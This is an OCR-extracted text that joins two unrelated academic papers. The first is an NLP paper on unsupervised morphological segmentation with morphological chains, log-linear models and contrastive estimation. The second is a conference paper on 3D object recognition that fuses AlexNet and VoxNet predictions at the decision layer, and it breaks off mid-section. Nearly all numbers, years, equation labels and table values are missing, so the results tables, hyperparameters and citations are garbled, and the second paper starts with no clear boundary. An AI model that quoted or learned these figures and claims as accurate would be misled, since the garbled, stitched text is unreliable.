type t (recall that a can- didate z ∈ z is the pair (p,t)). for computing some of these features, we use an unannotated list of words with frequencies (details in section ). ta- ble provides a summary of the features. semantic similarity we hypothesize that mor- phologically related words exhibit semantic similar- ity. to this end, we introduce a feature that mea- sures cosine similarity between the word vectors of the word (~w) and the parent (~p). these word vectors are learned from co-occurrence patterns from a large corpus (see section for details). to validate this measure, we computed the cosine similarity between words and their morphological parents from the celex database (baayen et al., ). on average, the resulting word-parent sim- ilarity score is . , compared to . for ran- domly chosen word-parent combinations. affixes a distinctive feature of affixes is their fre- quent occurrence in multiple words. to capture this pattern, we automatically generate a list of fre- quently occurring candidate affixes. these candi- dates are collected by considering the string differ- ence between a word and its parent candidates which appear in the word list. for example, for the word paints, possible suffixes include -s derived from the for strings which do not have a vector learnt from the cor- pus, we set the cosine value to be - . . the cosine values range from around - . to . usually. 
language top suffixes english -s, -’s, -d, -ed, -ing, -’, -s’, -ly, -er, -e turkish -n, -i, -lar, -dir, -a, -den, -de, -in, -leri, -ler arabic -p, -a, -f, -y, -t, -af, -h, -ha, -yp, -at table : top ten suffixes in automatically produced suffix lists. parent paint, -ts from the parent pain and -ints from the word pa. similarly, we compile a list of poten- tial prefixes. these two lists are sorted by their fre- quency and thresholded. for each affix in the lists, we have a corresponding indicator variable. for un- seen affixes, we use an unk (unknown) indicator. these automatically constructed lists act as a proxy for the gold affixes. in english, choosing the top suffixes in this manner gives us correct suffixes (compared against gold suffixes). table gives some examples of suffixes generated this way. affix correlation while the previous feature con- siders one affix assignment at a time, there is a known correlation between affixes attached to the same stem. for instance, in english, verbs that can be modified by the suffix -ing, can also take the related suffix -ed. therefore, we introduce a fea- ture that measures, whether for a given affix and parent, we also observe in the wordlist the same parent modified by its related affix. for exam- ple, for the pair (walking, walk), the feature in- stance affixcorr(ing, ed) is set to , because the word walked is in the wordlist. to construct pairs of related affixes, we compute the correlation between pairs in auto-generated affix list described previously. this correlation is propor- tional to the number of stems the two affixes share. for english, examples of such pairs include (inter-, re-), (under-, over-), (-ly, -s), and (-er, -ing). presence in wordlist we want to bias the model to select parents that constitute valid words. more- over, we would like to take into account the fre- quency of the parent words. we encode this infor- mation as the logarithm of their word counts in the wordlist (wordfreq). for parents not in the wordlist, we set a binary outofvocab feature to . this is not an absolute requirement in the model. feature type word (w) candidate (p,t) feature value cosine painter (paint, suffix) ~w ·~p . affix painter (paint, suffix) suffix=er affix correlation walking (walk, suffix) affixcorr(ing, ed) wordlist painter (paint, suffix) wordfreq . outofvocab transformations planning (plan, repeat) type=repeat × chars=(n,-) deciding (decide, delete) type=delete × chars=(e,-) carried (carry, modify) type=modify × chars=(y,i) stop painter (-, stop) begin=pa end=er . < maxcos < . length= table : example of various types of features used in the model. ~w and ~p are the word vectors for the word and parent, respectively. transformations we also support transforma- tions to enable non-concatenative morphology. even in english, which is mostly concatenative, such transformations are frequent. we consider three kinds of transformations previously considered in the literature (goldwater and johnson, ): • repetition of the last character in the parent (ex. plan → planning ) • deletion of the last character in the parent (ex. decide → deciding ) • modification of the last character of the parent (ex. carry → carried ) we add features that are the cartesian prod- uct of the type of transformation and the charac- ter(s) involved. for instance, for the parent-child pair (believe, believing ), the feature type=delete × chars=(e,-) will be activated, while the rest of the transformational features will be . 
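to make the candidate construction described earlier concrete, the following sketch enumerates (parent, type) candidates for a word: plain splits at every position, the three last-character transformations (repetition, deletion, modification), and the stop option. the function and variable names are ours, the length restriction follows the footnote that parents shorter than half the word are discarded, and enumerating all letters for the delete/modify cases is a simplifying assumption rather than the authors' exact procedure.

```python
import string

def candidates(word):
    """enumerate (parent, type) candidates for `word`: splits at every position,
    the three last-character transformations, and a stop candidate."""
    cands = set()
    n = len(word)
    for i in range(1, n):
        left, right = word[:i], word[i:]
        if 2 * len(left) >= n:                                # keep parents at least half as long
            cands.add((left, 'suffix'))                       # cars -> (car, 'suffix')
            if len(left) >= 2 and left[-1] == left[-2]:
                cands.add((left[:-1], 'repeat'))              # planning -> (plan, 'repeat')
            for c in string.ascii_lowercase:
                if c != left[-1]:
                    cands.add((left[:-1] + c, 'modify'))      # cars -> (cat, 'modify')
                cands.add((left + c, 'delete'))               # cars -> (cart, 'delete')
        if 2 * len(right) >= n:
            cands.add((right, 'prefix'))                      # cars -> (ars, 'prefix')
    cands.add(('-', 'stop'))                                  # treat the word as a base word
    return cands
```

for "cars" this yields, among others, (car, suffix), (cat, modify), (cart, delete) and (-, stop), matching the examples given in the text; a log-linear score over the features of each (word, candidate) pair then defines p(z|w) by normalizing over exactly this candidate set.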
stop condition finally, we introduce features that aim to identify base words which do not have a parent. the features include the length of the word, and the starting and ending character uni- grams and bigrams. in addition, we include a feature that records the highest cosine similarity between the word and any of its candidate parents. this fea- ture will help, for example, to identify paint as a base word, instead of choosing pain as its parent. . learning we learn the log-linear model in an unsupervised manner without explicit feedback about correct mor- phological segmentations. we assume that we have an unannotated wordlist d for this purpose. a typ- ical approach to learning such a model would be to maximize the likelihood of all the observed words in d over the space of all strings constructible in the alphabet, Σ∗, by marginalizing over the hidden candidates. in other words, we could use the em- algorithm to maximize l(θ; d) = ∏ w∗∈d p(w∗) = ∏ w∗∈d ∑ z∈c(w∗) p(w∗,z) = ∏ w∗∈d [ ∑ z∈c(w∗) e θ·φ(w∗,z) ∑ w∈Σ∗ ∑ z∈c(w) e θ·φ(w,z) ] ( ) however, maximizing l(θ; d) is problematic since approximate methods would be needed to sum over Σ∗ in order to calculate the normalization term in ( ). moreover, we would like to encourage the model to emphasize relevant parent-child pairs out of a smaller set of alternatives rather than those per- taining to all the words. we also tried maximizing instead of marginalizing, but the model gets stuck in one of the numerous local optima. in other words, assign higher probability mass. we employ contrastive estimation (smith and eisner, ) and replace the normalization term by a sum over the neighbors of each word. for each word in the language, we create neighboring strings in two sets. for the first set, we transpose a single pair of adjacent characters of the word. we perform this transposition over the first k or the last k charac- ters of the word. for the second set, we transpose two pairs of characters simultaneously – one from the first k characters and one from the last k. the combined set of artificially constructed words represents the events that we wish to move probabil- ity mass away from in favor of the actually observed words. the neighbors facilitate the learning of good weights for the affix features by providing the re- quired contrast (at both ends of the words) to the actual words in the vocabulary. a remaining con- cern is that the model may not distinguish any arbi- trary substring from a good suffix/prefix. for exam- ple, -ng appears in all the words that end with -ing, and could be considered a valid suffix. we include other features to help make this distinction. specifi- cally, we include features such as word vector simi- larity and the presence of the parent in the observed wordlist. for example, in the word painting, the par- ent candidate paint is likely to occur and also has a high cosine similarity with painting in terms of their word vectors. in contrast, painti does not. given the list of words and their neighborhoods, we define the contrastive likelihood as follows: ( ) lce(θ,d) = ∏ w∗∈d [ ∑ z∈c(w∗) e θ·φ(w∗,z) ∑ w∈n(w∗) ∑ z∈c(w) e θ·φ(w,z) ] where n(w∗) is the neighborhood of w∗. this like- lihood is much easier to evaluate and optimize. after adding in a standard regularization term, we maximize the following log likelihood objective: ( ) ∑ w∗ ∈d  log ∑ z∈c(w∗) eθ·φ(w ∗,z) − log ∑ w∈n(w∗) ∑ z∈c(w) eθ·φ(w,z)  −λ||θ|| the performance increases with increasing k until k = , after which no gains were observed. 
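the neighborhood n(w∗) used in this objective can be sketched as follows; this is our reading of the construction described above (single transpositions of adjacent characters within the first k or last k positions, plus simultaneous transpositions at both ends), with k left as a parameter rather than the value used by the authors.

```python
def transpose(word, i):
    """swap the adjacent characters at positions i and i+1."""
    return word[:i] + word[i + 1] + word[i] + word[i + 2:]

def neighborhood(word, k=3):
    """contrastive-estimation neighbors: set 1 transposes one adjacent pair inside the
    first k or last k characters; set 2 transposes one pair at each end simultaneously."""
    n = len(word)
    front = list(range(min(k - 1, n - 1)))        # pair positions within the first k chars
    back = list(range(max(0, n - k), n - 1))      # pair positions within the last k chars
    single = {transpose(word, i) for i in front + back}
    double = {transpose(transpose(word, i), j)
              for i in front for j in back if j > i + 1}
    return (single | double) - {word}             # exclude the observed word itself
```

these artificially constructed neighbors supply the contrast against which the observed words must receive higher score, which is what makes the normalization term of the objective tractable.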
the corresponding gradient can be derived as: ∂lce(θ; d) ∂θj = ∑ w∗∈d [∑ z∈c(w∗) φj(w ∗,z) ·eθ·φ(w∗,z) ∑ z∈c(w∗) e θ·φ(w∗,z) − ∑ w∈n(w∗) ∑ z∈c(w) φj(w,z) ·eθ·φ(w,z)∑ w∈n(w∗) ∑ z∈c(w) e θ·φ(w,z) ] − λθj ( ) we use lbfgs-b (byrd et al., ) to optimize lce(θ; d) with gradients given above. . prediction given a test word, we predict a morphological chain in a greedy step by step fashion. in each step, we use the learnt weights to predict the best parent for the current word (from the set of candidates), or choose to stop and declare the current word as a base word if the stop case has the highest score. once we have the chain, we can derive a morphological segmentation by inserting a segmentation point (into the test word) appropriately for each edge in the chain. algorithms and provide details on the predic- tion procedure. in both algorithms, type refers to the type of modification (or lack of) that the parent undergoes: prefix/suffix addition, types of transfor- mation like repetition, deletion, modification, or the stop case. algorithm procedure to predict a parent for a word : procedure predict(word) : candidates ← candidates(word) : bestscore ← : bestcand ← (−,stop) : for cand ∈ candidates do : features ← features(word,cand) : score ← modelscore(features) : if score > bestscore then : bestscore ← score : bestcand ← cand : return bestcand algorithm procedure to predict a morphological chain : procedure getchain(word) : candidate ← predict(word) : parent,type ← candidate : if type = stop then return [(word, stop)] : return getchain(parent)+[(parent,type)] lang train test wordvec (# words) (# words) (# words) english mc- mc- : wikipedia ( k) ( ) ( m) turkish mc- mc- : boun ( k) ( ) ( m) arabic gigaword atb gigaword ( . m) ( k) ( . g) table : data corpora and statistics. mc- = mor- phochallenge , mc- : = morphochal- lenges - (aggregated), boun = boun cor- pus (sak et al., ), gigaword = arabic gigaword corpus (parker et al., ), atb = arabic tree- bank (maamouri et al., ) experimental setup data we run experiments on three different lan- guages: english, turkish and arabic. for each lan- guage, we utilize corpora for training, testing and learning word vectors. the training data consists of an unannotated wordlist with frequency information, while the test data is a set of gold morphological segmentations. for the word vectors, we train the word vec tool (mikolov et al., ) on large text corpora and obtain -dimensional vectors for all three languages. table provides information about each dataset. evaluation measure we test our model on the task of morphological segmentation. we evalu- ate performance on individual segmentation points, which is standard for this task (virpioja et al., ). we compare predicted segmentations against the gold test data for each language and report overall precision, recall and f- scores calculated across http://research.ics.aalto.fi/events/morphochallenge/ all segmentation points in the data. as is common in unsupervised segmentation (poon et al., ; sirts and goldwater, ), we included the test words (without their segmentations) with the train- ing words during parameter learning. baselines we compare our model with five other systems: morfessor baseline (morf-base), morfes- sor catmap (morf-cat), agmorph, the lee seg- menter and the system of poon et al. ( ). 
mor- fessor has achieved excellent performance on the morphochallenge dataset, and is widely used for performing unsupervised morphological analysis on various languages, even in fairly recent work (lu- ong et al., ). in our experiments, we employ two variants of the system because their relative per- formance varies across languages. we use publicly available implementations of these variants (virpi- oja et al., ; creutz and lagus, ). we perform several runs with various parameters, and choose the run with the best performance on each language. we evaluate agmorph by directly obtaining the posterior grammars from the authors. we show results for the compounding grammar, which we find has the best average performance over the lan- guages. the lee segmenter (lee et al., ), im- proved upon by using maximum marginal decoding in stallard et al. ( ), has achieved excellent per- formance on the arabic (atb) dataset. we perform comparison experiments with the model (m ) of the segmenter, which employs latent pos tags, and does not require sentence context which is not avail- able for other languages in the dataset. we obtained the code for the system, and run it on our english and turkish datasets. we do not have access to an implementation of poon et al’s system; hence, we directly report scores from their paper on the atb dataset and test our model on the same data. results table details the performance of the various mod- els on the segmentation task. we can see that our method outperforms both variants of morfessor, the grammars were trained using data we provided to them. we report numbers on arabic directly from their paper. figure : model performance vs data size obtained by frequency thresholding with an absolute gain of . %, . % and % in f- score on english, turkish and arabic, respectively. on arabic, we obtain a . % absolute improvement over poon et al.’s model. agmorph doesn’t seg- ment better than morfessor on english and arabic but does very well on turkish ( . % f compared to our model’s . %). this could be due to the fact that the compounding grammar is well suited to the agglutinative morphology in turkish and hence pro- vides more gains than for english and arabic. the lee segmenter (m ) performs the best on arabic ( % f ), but lags behind on english and turkish. this result is consistent with the fact that the system was optimized for arabic. the table also demonstrates the importance of the added semantic information in our model. for all three languages, having the features that utilize co- sine similarity provides a significant boost in perfor- mance. we also see that the transformation features and affix correlation features play a role in improv- ing the results, although a less important one. next, we study the effect of data quality on the prediction of the algorithm. a training set often contains misspellings, abbreviations and truncated words. thresholding based on frequency is com- monly used to reduce this noise. figure shows the performance of the algorithm as a function of the data size obtained at various degrees of threshold- ing. we note that the performance of the model on all three languages remains quite stable from about lang method prec recall f- english morf-base . . . morf-cat . . . agmorph . . . lee (m ) . . . model -c . . . model -t . . . model -a . . . full model . . . turkish morf-base . . . morf-cat . . . agmorph . . . lee (m ) . . . model -c . . . model -t . . . model -a . . . full model . . . arabic morf-base . . . morf-cat . . . agmorph . . . 
poon et al. . . . lee (m ) - - . model -c . . . model -t . . . model -a . . . full model . . . table : results on unsupervised morphological segmentation; scores are calculated across all seg- mentation points in the test data. baselines are in italics. -c=without cosine features, -t=without transformation features, -a=without affix correla- tion features. numbers on arabic for poon et al. and lee (m ) are reported directly from their papers. to training words, after which the devia- tions are more apparent. the plot also demonstrates that the model works well even with a small amount of quality data (≈ most frequent words). error analysis we look at a random subset of incorrectly segmented words in the model’s output for each language. table gives a breakup of errors in all languages due to over or under-segmentation. table provides examples of correct and incorrect segmentations predicted by our model. words with at least one segmentation point incorrect language correct segmentations incorrect segmentations word segmentation word predicted correct english salvoes salvo-es contempt con-tempt contempt negotiations negotiat-ion-s sterilizing steriliz-ing steril-iz-ing telephotograph tele-photo-graph desolating desolating desolat-ing unequivocally un-equivocal-ly storerooms storeroom-s store-room-s carsickness’s car-sick-ness-’s tattlers tattler-s tattl-er-s turkish moderni modern-i mektuplaşmalar mektuplaşma-lar mektup-laş-ma-lar teknolojideki teknoloji-de-ki gelecektiniz gelecek-tiniz gel-ecek-ti-niz burasıydı bura-sı-ydı aynalardan ayna-lar-da-n ayna-lar-dan çizgisine çiz-gi-si-ne uyuduğunuzu uyudu-ğu-nuzu uyu-duğ-unuz-u değişiklikte değişik-lik-te dirseğe dirseğe dirseğ-e arabic sy$ark s-y-$ark wryfaldw w-ry-faldw w-ryfaldw nyqwsya nyqwsya bhlwlha b-hlwl-h-a b-hlwl-ha almtrwhp al-mtrwh-p jnwby jnwb-y jnwby yteamlwa y-teaml-wa wbayrn w-bayr-n w-bayrn latnzr la-t-nzr rknyp rknyp rkny-p table : examples of correct and incorrect segmentations produced by our model on the three languages. correct segmentations are taken directly from gold morphochallenge data. lang over-segment under-segment english % % turkish % % arabic % % table : types of errors in analysis of randomly sampled incorrect segmentations for each language. the remaining errors are due to incorrect placement of segmentation points. in english, most errors are due to under- segmentation of a word. we find that around % of errors are due to roots that undergo transformations while morphing into a variant (see table for exam- ples). errors in turkish are also mostly due to under- segmentation. on further investigation, we find that most such errors ( % of the %) are due to parent words either not in vocabulary or having a very low word count (≤ ). in contrast, we observe a ma- jority of over-segmentation errors in arabic ( %). this is likely because of arabic having more sin- gle character affixes than the other languages. we find that % of errors in arabic involve a single- character affix, which is much higher than the . % that involve a two-letter affix. in contrast, % of er- rors in english are due to single character affixes – around the same number as the % of errors due to two-letter affixes. since our model is an unsupervised one, we make several simplifying assumptions to keep the candi- date set size manageable for learning. for instance, we do not explicitly model infixes, since we select parent candidates by only modifying the ends of a word. 
also, the root-template morphology of ara- bic, a semitic language, presents a complexity we do not directly handle. for instance, words in ara- bic can be formed using specific patterns (known as binyanim) (ex. nzr → yntzr ). however, on going through the errors, we find that only % are due to these binyanim patterns not being cap- tured. adding in transformation rules to capture these types of language-specific patterns can help in- crease both chain and segmentation accuracy. analysis of learned distributions to investigate how decisive the learnt model is, we examine the final probability distribution p(z|w) of parent can- didates for the words in the english wordlist. we observe that the probability of the best candidate (maxzp(z|w)), averaged over all words, is . . we also find that the average entropy of the distri- this might be due to the fact that the gold segmentations also do not capture such patterns. for example, the gold seg- mentation for yntzrwn is given as y-ntzr-wn, even though ntzr is not a valid root. figure : comparison of gold and predicted fre- quency distributions of the top affixes for english butions is . , which is quite low considering that the average number of candidates is . per word, which would result in a max possible entropy of around . if the distributions were uniform. this demonstrates that the model tends to prefer a single parent for every word, which is exactly the behav- ior we want. affix analysis we also analyze the various affixes produced by the model, and compare with the gold affixes. particularly, we plot the frequency distri- butions of the affixes obtained from the gold and note that the candidate probability distribution may have more than a single peak in some cases. to conserve space, we only show the distribution of suf- fixes here, but we observe a similar trend for prefixes. predicted segmentations for the english test data in figure . from the figure, we can see that our model learns to identify good affixes for the given language. sev- eral of the top affixes predicted are also present in the gold list, and we also observe similarities in the frequency distributions. conclusion in this work, we have proposed a discriminative model for unsupervised morphological segmenta- tion that seamlessly integrates orthographic and se- mantic properties of words. we use morpholog- ical chains to model the word formation process and show how to employ the flexibility of log-linear models to incorporate both morpheme and word- level features, while handling transformations of parent words. our model consistently equals or out- performs five state-of-the-art systems on arabic, en- glish and turkish. future directions of work in- clude using better neighborhood functions for con- trastive estimation, exploring other views of the data that could be incorporated, examining better predic- tion schemes and employing morphological chains in other applications in nlp. acknowledgements we thank kairit sirts and yoong keok lee for helping run experiments with their unsupervised morphological analyzers, and yonatan belinkov for helping with error analysis in arabic. we also thank the anonymous tacl reviewers and mem- bers of mit’s nlp group for their insightful com- ments and suggestions. this work was supported by the intelligence advanced research projects activ- ity (iarpa) via department of defense us army research laboratory contract number w nf- - c- . the u.s. 
government is authorized to reproduce and distribute reprints for governmen- tal purposes notwithstanding any copyright annota- tion thereon. the views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or im- plied, of iarpa, dod/arl, or the u.s. govern- ment. references r baayen, r piepenbrock, and l gulikers. . celex ldc l . philadelphia: linguistic data consortium. marco baroni, johannes matiasek, and harald trost. . unsupervised discovery of morphologically re- lated words based on orthographic and semantic simi- larity. corr, cs.cl/ . richard h byrd, peihuang lu, jorge nocedal, and ciyou zhu. . a limited memory algorithm for bound constrained optimization. siam journal on scientific computing, ( ): – . mathias creutz and krista lagus. . inducing the morphological lexicon of a natural language from unannotated text. in proceedings of the international and interdisciplinary conference on adaptive knowl- edge representation and reasoning (akrr), pages – . mathias creutz and krista lagus. . unsuper- vised models for morpheme segmentation and mor- phology learning. acm trans. speech lang. process., ( ): : – : , february. markus dreyer and jason eisner. . discover- ing morphological paradigms from plain text using a dirichlet process mixture model. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational linguistics. sharon goldwater and mark johnson. . priors in bayesian learning of phonological rules. in proceed- ings of the th meeting of the acl special interest group in computational phonology: current themes in computational phonology and morphology, sig- morphon ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. yoong keok lee, aria haghighi, and regina barzi- lay. . modeling syntactic context improves morphological segmentation. in proceedings of the fifteenth conference on computational natural lan- guage learning, conll ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. minh-thang luong, richard socher, and christopher d. manning. . better word representations with re- cursive neural networks for morphology. in conll, sofia, bulgaria. mohamed maamouri, ann bies, hubert jin, and tim buckwalter. . arabic treebank: part v . ldc t . philadelphia: linguistic data consor- tium. tomas mikolov, ilya sutskever, kai chen, greg corrado, and jeffrey dean. . distributed representations of words and phrases and their compositionality. corr, abs/ . . robert parker, david graff, ke chen, junbo kong, and kazuaki maeda. . arabic gigaword fifth edition ldc t . philadelphia: linguistic data consor- tium. hoifung poon, colin cherry, and kristina toutanova. . unsupervised morphological segmentation with log-linear models. in proceedings of human lan- guage technologies: the annual conference of the north american chapter of the association for computational linguistics, naacl ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. haşim sak, tunga güngör, and murat saraçlar. . turkish language resources: morphological parser, morphological disambiguator and web corpus. in ad- vances in natural language processing, pages – . springer. patrick schone and daniel jurafsky. . knowledge- free induction of morphology using latent semantic analysis. 
in proceedings of the nd workshop on learning language in logic and the th conference on computational natural language learning - vol- ume , conll ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. kairit sirts and sharon goldwater. . minimally- supervised morphological segmentation using adaptor grammars. tacl, : – . noah a. smith and jason eisner. . contrastive estimation: training log-linear models on unlabeled data. in proceedings of the rd annual meeting on association for computational linguistics, acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. benjamin snyder and regina barzilay. . unsuper- vised multilingual learning for morphological segmen- tation. in the annual conference of the association for computational linguistics. david stallard, jacob devlin, michael kayser, yoong keok lee, and regina barzilay. . unsupervised morphology rivals supervised mor- phology for arabic mt. in proceedings of the th annual meeting of the association for computational linguistics: short papers-volume , pages – . association for computational linguistics. sami virpioja, ville t. turunen, sebastian spiegler, os- kar kohonen, and mikko kurimo. . empirical comparison of evaluation methods for unsupervised learning of morphology. tal, ( ): – . sami virpioja, peter smit, stig-arne grönroos, and mikko kurimo. . morfessor . : python imple- mentation and extensions for morfessor baseline. re- port in aalto university publication series science + technology, department of signal processing and acoustics, aalto university, helsinki, finland. international conference on sensor network and computer engineering (icsnce ) d target recognition based on decision layer fusion ma xing a* , yu fan b , yu haige, wei yanxi, yang wenhui school of computer science and engineering xi’an techonolgical university xi’an , , shaanxi e-mail: a* @qq.com; b yffshun@ .com abstract—target recognition has always been a hot research topic in computer image and pattern recognition. this paper proposes a target recognition method based on decision layer fusion. modelnet[ ]—the d cad model library,which is used to be identified. features are extracted from the model's point cloud data and multi-view images. the image is identified using the alexnet[ ] network ,the point cloud is identified by the voxnet[ ] network. the fusion algorithm is used in the decision layer to complete the fusion of features. the results show that the proposed method improves the accuracy of object recognition. keywords-target recognition; convolutional neural network; decision fusion i. introduction at present, the methods for identifying objects are mainly divided into two categories. the first is to identify the images generated by the objects, and the second is to identify the point clouds generated by the objects. in terms of image recognition, the current deep learning method has a high recognition rate. for instance, xie etal. [ ] adopt the multi-view depth image representation and propose multi-view deepextreme learning machine (mvd-elm) to achieve fast and quality projective feature learning for d shapes. zhu et al.[ ] alsoproject d shapes into d space and use autoencoder for featurelearning on d images. in , the imagenet contest champion model--alexnet became a classical convolutional neural network image classification model. for the identification of point clouds, domestic and foreign scholars have done a lot of research. 
some scholars use the method of manually extracting features to classify and identify. r.b.rusu[ ]and others used the relationship between the normal vectors of a region as a feature to classify objects for recognition. yasir salihet al. [ ] used vfh as a feature and used a support vector machine as a classifier to classify and recognize point clouds. manually extracting features requires very professional knowledge and rich experience. convolutional neural networks can automatically extract features and classify them, and they are invariant to displacements, scaling, and other forms of rigid body changes. some experts and scholars have used convolutional neural networks to classify and recognize point cloud images, of which the voxnet network has the highest recognition rate. the above method achieves higher accuracy in target classification recognition. i have seen that image recognition is affected by factors such as lighting and viewing angles. the accuracy of point cloud recognition is lower than that of image recognition. therefore, this paper integrates the image and the point cloud at the decision-making level to improve the accuracy of object recognition. ii. network structure a. convolutional neural network traditional shallow learning methods such as support vector machines require manually extracting image features and then sending the features into the classifier for training. this leads to a problem that the manually extracted feature is not necessarily the best description of the current image. even if the selected feature is very suitable for the current image, when the external conditions of the object such as the angle, size, and illumination of the image change, the manually selected feature cannot adapt well to this change, and it is necessary to artificially adjust the selected feature according to the situation. different from the traditional shallow learning method, the input of the convolutional neural network is the entire image. it continuously adjusts the parameters of the network through a learning algorithm and adaptively extracts the most significant features of the current image, which avoids manual intervention and saves a large amount of manpower, with the continuous updating of the input pictures, the essential features of the current picture are extracted with the times, ensuring the accuracy and efficiency of the recognition. as a special architecture that is particularly suitable for classifying images, compared with conventional shallow machine learning methods such as support vector machines, convolutional neural networks can be much smaller than normal when faced with large-scale high-resolution image classification problems. the method learns more picture information in the training time, and the classification accuracy is higher than the conventional method, which is due to its unique network architecture. the convolutional neural network consists of three parts: the convolutional layer, the down-sampling layer and the fully connected layer. the down-sampling is usually after the convolutional layer, alternating with the convolutional layer, and finally connected to the fully connected layer. convolutional neural networks use local connections, weight sharing, and spatial or temporal correlation down-sampling to obtain good translation, scaling, and distortion invariance, making the extracted features more distinguishable. cnns international conference on sensor network and computer engineering (icsnce ) training includes forward propagation. 
the two processes of forward propagation and reverse propagation are the process of the input signal output from the input layer, through several hidden layers, and the output layer. the reverse propagation is the process of back propagation of the error signal from the output layer to the input layer. it mainly uses errors. the back propagation (error back propagation, ebp) algorithm and gradient descent adjust the weights at each level of the network and is similar to the training process of an ordinary neural network. b. alexnet network structure the standard convolutional neural network(cnn) is a special multilayer feed forward neural network. it has a deep network structure and is generally composed of an input layer, a convolutional layer, a down-sampling layer, a fully connected layer, and an output layer. the convolutional layer, the down-sampling layer, and the fully connected layer are hidden layers. alexnet uses two gpu services. the model is divided into eight layers, five convolutional layers and three fully connected layers. each convolutional layer contains the excitation function relu and local response normalization (lrn) processing, and then after down-sampling (pool). the network structure designed in this paper is shown in figure . figure . multi-view image network structure diagram the input layer are images, there are convolutional layers. the number of feature maps are , , , ,and features respectively. the convolution kernel sizes respectively are , , , , and ,below the first two convolutional layers there is a largest pooled layer with an lrn layer for localized normalization. the largest pooled layer is to take the maximum value of the feature points in the domain. after processing through the convolution layer, many features are obtained. the amount of direct calculation is very large, and the increase of features is particularly prone to overfitting. therefore, the network constructed in this paper is each time a convolution process is performed, a max-pooling layer is added. the dropout layer has a discard rate of . . dropout temporarily discards some networks in the training process with a certain probability, and each mini-batch discards different networks. it can reduce the amount of calculation, and more importantly it can prevent over-fitting. the number of neurons in two fully connected layers is and , respectively. the last output layer is the softmax[ ]layer, which does not directly output the classification of the identified image, but rather the probability that the output image belongs to each classification. c. voxnet network structure figure shows the network structure of voxnet. the input layer accepts data as a form. there are a total of two convolutional layers, and the number of feature maps is , using the sum of the convolution kernels. the dropout layer discard rates are . and . , respectively, to prevent overfitting while reducing the amount of computation. the largest pooled layer, the filter used. finally, there is a fully connected layer with neurons and a dropout layer with a discard rate of . . the seventh layer is the output layer and the number of neurons is . input layer cov d layer dropout layer cov d layer fully layer dropout layer max pool d layer dropout layer output layer figure . voxnet network structure diagram d. network convergence structure multi sensor information fusion is to extract and integrate the same target image with a multi-source information channel for further processing. 
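referring back to the voxnet structure summarized in section c above, a minimal keras-style sketch of such a 3d network is shown below. the input resolution, filter counts, kernel sizes, dropout rates and layer widths are assumptions borrowed from the commonly used voxnet configuration, since the exact values are not reproduced here; this is an illustrative sketch, not the authors' implementation.

```python
from tensorflow.keras import layers, models

def build_voxnet(input_shape=(32, 32, 32, 1), num_classes=40, fc_units=128):
    """a voxnet-style 3d cnn: two 3d convolutions with dropout, one 3d max-pooling
    layer, a fully connected layer, and a softmax output layer."""
    return models.Sequential([
        layers.Input(shape=input_shape),                      # voxelized point cloud
        layers.Conv3D(32, kernel_size=5, strides=2, activation='relu'),
        layers.Dropout(0.2),
        layers.Conv3D(32, kernel_size=3, activation='relu'),
        layers.Dropout(0.3),
        layers.MaxPooling3D(pool_size=2),
        layers.Flatten(),
        layers.Dense(fc_units, activation='relu'),
        layers.Dropout(0.4),
        layers.Dense(num_classes, activation='softmax'),      # class probability vector
    ])
```

the alexnet branch used for the multi-view images can be written analogously with 2d convolutions; in both cases the final softmax output is what the decision-layer fusion described next operates on.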
information fusion can be divided into three layers: the fusion based on data layer, the fusion based on the feature layer, and the fusion based on the decision layer. the level of fusion was from low to high. so this paper uses the method of decision layer fusion. the feature fusion of the decision layer is usually the fusion of the prediction results of multiple classifiers. we extract various features from feature extraction algorithm. we assume that all kinds of features are independent of each other, and these features can separately predict the result of recognition separately. on this basis, we send data into their respective classifiers, get the prediction results of each classifier, then combine all the classifier's prediction to get the final recognition results, and complete the fusion of multiple features in the decision level. as shown in figure , point cloud is extracted from voxnet using point cloud feature, and alexnet is used to extract image features. softmax regression model is used to complete recognition and classification respectively. the fusion algorithm is used in the decision layer to complete the fusion of features. international conference on sensor network and computer engineering (icsnce ) figure . fusion model iii. . experiments a. experiment environement the environment used in this experiment was tensorflow-gpu . . open source software library, windows operating system, and nvidia gtx graphics card. the data used in the experiment was modelnet of princeton university. modelnet is a large-scale d cad model database, similar to imagenet in d images. b. experiment datasets this article uses the modelnet dataset, where the point cloud dataset is from the dataset in pointnet[ ], and the d image is from multi-view. on the topside of figure is the point cloud image, at the bottom is a two-dimensional image. figure . point cloud image and two-dimensional image c. linear combination coefficient selection static linear combination of the results of the alexnet network and voxnet network prediction results in the final prediction. before linear combination, we need to determine the coefficients of each classifier's prediction result, which controls the relative importance of the results predicted by each classifier. it is very important to choose a suitable coefficient. the appropriate coefficient can fully exert the advantages of each classifier and make a joint decision. the final recognition accuracy rate will be better than the recognition accuracy of a single classifier. the use of inappropriate coefficients will result in the classification accuracy of the final joint decision even lower than that of a single classifier. there will be a softmax classifier at the last level of the alexnet and voxnet network. for each input sample, the output of the softmax classifier is a probability vector , that the sample may belong to. where represents the probability that the sample belongs to class n, and n represents the number of classes of all samples. with , the sum of the probabilities that a sample belongs to all classes is . in the object recognition of a single classifier, we will choose the probability. the class label corresponding to the largest element in the vector is the class corresponding to the sample. in this chapter, for each test sample, the obtained recognition rate results are 、 , and the coefficients of each classifier are α and β respectively. then we can complete the fusion of all base classifiers according to eq. . 
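the fusion referred to as eq. above is a static linear combination of the two classifiers' softmax probability vectors; a minimal numpy sketch (variable and function names are ours):

```python
import numpy as np

def fuse_predictions(p_alexnet, p_voxnet, alpha, beta):
    """decision-layer fusion: weighted sum of the image-based (alexnet) and
    point-cloud-based (voxnet) softmax outputs, followed by an argmax over classes."""
    p_alexnet = np.asarray(p_alexnet, dtype=float)
    p_voxnet = np.asarray(p_voxnet, dtype=float)
    fused = alpha * p_alexnet + beta * p_voxnet   # one combined score per class
    return fused, int(np.argmax(fused))           # fused vector and predicted class label
```

with alpha + beta = 1 the fused vector remains a probability distribution; as described in the text, the classifier with the higher stand-alone accuracy is given the larger coefficient.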
